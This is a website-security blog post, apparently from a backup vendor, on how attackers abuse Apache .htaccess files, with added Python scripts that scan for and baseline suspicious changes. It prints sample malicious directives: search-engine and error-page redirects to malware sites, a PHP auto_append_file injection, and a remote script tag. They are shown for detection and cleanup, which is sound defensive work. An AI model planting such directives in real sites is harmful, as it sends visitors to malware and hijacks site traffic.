Website security and .htaccess files

The .htaccess file is a hidden text file used by the Apache web server to configure your website without creating or modifying the global server configuration files. It is usually located in the root folder of the website but can also be placed in subdirectories, depending on which files and folders you want the configuration to apply to: a .htaccess file affects the directory it sits in and everything below it.

This file contains a series of “directives,” similar to those in traditional Apache web server configuration files. Usually, these directives are key-value pair commands indicating if a configuration should be on or off, but they can be more complex. The .htaccess file allows anyone in control of a particular set of website content to execute many directives which can change the behavior of that site, without access to Apache’s global httpd.conf.

A typical .htaccess file.

Why is it important?

This file is very important to your website as it can affect both the availability and the security of your site or application. In this post, we are going to focus on the security functions of .htaccess, although it is important to understand that using a .htaccess file on your server might cause your site to load more slowly (Apache has to look for and parse a .htaccess file in every directory along the request path, on every request), negatively impacting your visitors, and adds complexity to your website or application setup.

According to the Apache web server documentation, if you have direct and easy access to your web server configuration files, then there’s no need to create and use a .htaccess file. This distributed configuration can create another point of failure or attack vector should your site or server get compromised.

Generally, developers use the .htaccess file to do one of the following:

  • Server Side Includes (SSI), which let a shared fragment such as a header or footer be pulled into many pages, so updating it updates all of those pages at once
  • Custom MIME types, if you need your server to serve certain file types with the correct Content-Type
  • mod_rewrite, which lets you change how URLs appear to your visitors by rewriting requests internally or redirecting them
  • Authentication, to require a password to access a certain part of your site
  • Custom error pages, which you can use to send users to a page of your own depending on what error occurred

How can it compromise my site?

Attackers can also use this file to make configuration changes on your site. If your site uses .htaccess and the file wasn't properly protected or configured, you are giving an attacker another entry point to access and compromise your server. Attackers can use this file to hide some kind of malware such as a backdoor, inject content, modify the PHP configuration, or even redirect visitors arriving from search engines (and search-engine robots, or crawlers) to their own sites to get more traffic.

There are many ways an attacker can redirect a victim to a malicious website. But these are the most common ones we see, especially with WordPress websites:

1. Redirect from search engines

One of the simplest and most common attacks is where an attacker adds this piece of code to the .htaccess of the compromised site:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteRule ^(.*)$ http://malwarewebsite.com/index.php [R=301,L]

If you see this in your .htaccess file and you don't know where it came from, remove it immediately! What this does is redirect users coming from search engine results (the HTTP_REFERER conditions match Google, Bing and Baidu) to a malicious website where they will be compromised. This kind of attack doesn't affect users who type the site's address directly into the browser address bar, which is what the owner or admin of the site usually does, so it can be hard to quickly identify and block the attack.

2. Redirect from error pages

Another common kind of attack is redirecting the error pages to malicious sites. This is much harder to detect, since you would have to cause an error or access a specific page on the site to trigger the redirection. When ErrorDocument is given a full URL rather than a local path, Apache answers the error with a redirect to that URL instead of serving a page, so every broken link, forbidden directory or bad request on the site becomes a door to the attacker's server. Here's an example of the directives that redirect from error pages:

RewriteEngine On
ErrorDocument 400 http://malwaresite.com/index.php
ErrorDocument 401 http://malwaresite.com/index.php
ErrorDocument 403 http://malwaresite.com/index.php
ErrorDocument 404 http://malwaresite.com/index.php

3. Inserting malware 

Another, less common, type of attack with the .htaccess file is where the attacker uses this file to change the PHP configuration, overriding php.ini directives. In this particular case, an attacker could set the 'auto_append_file' (or 'auto_prepend_file') value, which makes PHP include a hidden file at the end (or start) of every PHP script executed under that directory tree, so the malware is effectively injected into every PHP page the site serves without touching the site's own files. Usually, the appended code is a call or request to a malicious file somewhere under the attacker's control. It can be JavaScript malware or PHP malware. For example, the .htaccess directive:

php_value auto_append_file "/opt/malicious_code.php"

and a typical payload that the appended file would emit into every page:

<script src="http://hackedsite.com/javascript.js"></script>

Note that php_value only takes effect when PHP runs as an Apache module (mod_php). When PHP runs under CGI or PHP-FPM, the same directives are set from a per-directory .user.ini file instead, so that file deserves the same scrutiny as .htaccess.
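The three patterns above (search-engine redirects, error-page redirects, and PHP auto-include injection) can be spotted mechanically. The following Python scanner is an added example, not code from the original post or from CodeGuard's tooling: it reads a .htaccess body line by line and flags HTTP_REFERER conditions naming a search engine that feed a RewriteRule leaving the site, ErrorDocument directives that point at a full external URL, and php_value/php_admin_value lines that set auto_append_file or auto_prepend_file. The sample .htaccess text, the hostnames in it and the own-host list are constructed for the example.

```python
"""Flag .htaccess directives matching the three hijack patterns described above.

Added example, not code from the original post. SAMPLE_HTACCESS and every
hostname in it are constructed placeholders, not real indicators.
"""
import re
from typing import List, Tuple
from urllib.parse import urlparse

# RewriteCond on HTTP_REFERER naming a search engine: legitimate sites rarely
# need this, and it is the tell-tale of the "redirect from search engines" hijack.
SEARCH_REFERER_RE = re.compile(
    r"^RewriteCond\s+%\{HTTP_REFERER\}\s+\S*(google|bing|yahoo|baidu|yandex)", re.I)
# A RewriteRule whose substitution is an absolute URL always produces an
# external redirect in Apache, whether or not an [R] flag is present.
REWRITE_URL_RE = re.compile(r"^RewriteRule\s+\S+\s+(https?://\S+)", re.I)
# ErrorDocument given a full URL makes Apache redirect instead of serving a page.
ERROR_DOC_RE = re.compile(r"^ErrorDocument\s+(\d{3})\s+(https?://\S+)", re.I)
# php_value / php_admin_value setting an auto-include file (only effective under mod_php).
PHP_INCLUDE_RE = re.compile(
    r"^php_(?:admin_)?value\s+(auto_(?:append|prepend)_file)\s+(\S+)", re.I)

Finding = Tuple[int, str, str]  # (line number, category, offending line)


def _is_external(url: str, own_hosts: List[str]) -> bool:
    """True when the URL's host is not one of the site's own hostnames."""
    host = (urlparse(url).hostname or "").lower()
    return host not in {h.lower() for h in own_hosts}


def scan_htaccess(text: str, own_hosts: List[str]) -> List[Finding]:
    """Return one finding per suspicious directive, in file order."""
    findings: List[Finding] = []
    search_cond_pending = False  # RewriteCond lines apply only to the next RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if SEARCH_REFERER_RE.match(line):
            search_cond_pending = True
            continue
        if line.lower().startswith("rewriterule"):
            m = REWRITE_URL_RE.match(line)
            if m and _is_external(m.group(1), own_hosts):
                category = "search-engine-redirect" if search_cond_pending else "external-redirect"
                findings.append((lineno, category, line))
            search_cond_pending = False  # any RewriteRule consumes the pending conditions
            continue
        m = ERROR_DOC_RE.match(line)
        if m and _is_external(m.group(2), own_hosts):
            findings.append((lineno, "error-page-redirect", line))
            continue
        m = PHP_INCLUDE_RE.match(line)
        if m:
            findings.append((lineno, "php-auto-include", line))
    return findings


# Constructed sample: a normal front-controller rewrite block followed by the
# three malicious additions from the post, with placeholder hostnames.
SAMPLE_HTACCESS = """\
# constructed sample for this example
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?q=$1 [L]

RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteRule ^(.*)$ http://malwarewebsite.example/index.php [R=301,L]

ErrorDocument 404 /404.html
ErrorDocument 403 http://malwaresite.example/index.php

php_value auto_append_file "/opt/malicious_code.php"
"""

if __name__ == "__main__":
    for lineno, category, line in scan_htaccess(SAMPLE_HTACCESS, ["www.example.com"]):
        print(f"line {lineno}: {category}: {line}")
```

The local rewrite to index.php and the local /404.html error page produce no findings; only the three hostile directives do. Run it over each .htaccess in your document root (including ones in upload directories, where attackers like to drop them) and treat any finding as something to explain or remove.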

How to protect your site?

A CodeGuard ChangeAlert Email Notification

Even if you are not familiar with Apache configuration files, there are many things you can do to protect your site from being hacked. One of them is to monitor file changes on your site and verify that there are no unauthorized redirects that might indicate it was compromised. You should always keep backups of your files, including .htaccess, so that you can compare the backup against the copy currently on your server. In addition to providing these backups automatically, CodeGuard ChangeAlert email notifications explicitly call attention to .htaccess file changes so that you can monitor these files for modifications. Two further checks are worth doing if you have access to the server configuration: set AllowOverride None in httpd.conf for directories that do not need .htaccess, so Apache ignores the file entirely even if an attacker manages to write one, and make sure .htaccess files are not writable by the user the web server (and PHP) runs as, since most web-application compromises run with exactly those privileges.
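A minimal way to do the comparison described above, written as an added example (not CodeGuard's code): record a SHA-256 baseline of every .htaccess under the document root, then diff a fresh scan against it to list files that were added, removed or modified. The demo() function builds a throwaway document root in a temporary directory, so its paths, contents and hostnames are constructed; in real use you would keep the baseline file somewhere the web server user cannot write and re-run the check from cron.

```python
"""Baseline and re-check every .htaccess under a document root.

Added example, not code from the original post. demo() builds a constructed
document root in a temporary directory so the script runs stand-alone.
"""
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict, List

Baseline = Dict[str, str]  # relative path -> sha256 hex digest


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large files do not have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_tree(docroot: Path) -> Baseline:
    """Hash every .htaccess below docroot, keyed by POSIX-style relative path."""
    return {
        p.relative_to(docroot).as_posix(): sha256_file(p)
        for p in sorted(docroot.rglob(".htaccess"))
        if p.is_file()
    }


def save_baseline(baseline: Baseline, store: Path) -> None:
    store.write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(store: Path) -> Baseline:
    return json.loads(store.read_text())


def compare(old: Baseline, new: Baseline) -> Dict[str, List[str]]:
    """Report which .htaccess files appeared, disappeared or changed since the baseline."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def demo() -> Dict[str, List[str]]:
    """Simulate a compromise: the root .htaccess is edited, a new one is dropped in uploads/."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / ".htaccess").write_text("RewriteEngine On\n")
        (root / "wp-content").mkdir()
        (root / "wp-content" / ".htaccess").write_text("Options -Indexes\n")
        store = root / "htaccess-baseline.json"  # keep this outside the docroot in real use
        save_baseline(scan_tree(root), store)

        # The attacker's changes (constructed hostnames, not real indicators).
        (root / ".htaccess").write_text(
            "RewriteEngine On\nErrorDocument 404 http://malwaresite.example/index.php\n")
        (root / "wp-content" / "uploads").mkdir()
        (root / "wp-content" / "uploads" / ".htaccess").write_text(
            'php_value auto_append_file "/opt/malicious_code.php"\n')

        return compare(load_baseline(store), scan_tree(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The report names the modified root .htaccess and the new file under wp-content/uploads, while the untouched wp-content/.htaccess stays silent. Hashes, rather than modification times, are what you want here: an attacker who can write the file can also reset its timestamp.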

You can also scan your site for web application vulnerabilities such as SQL Injection or Cross Site Scripting. Check the OWASP Top 10 for more information about these kinds of vulnerabilities and tools you can use to test your website.
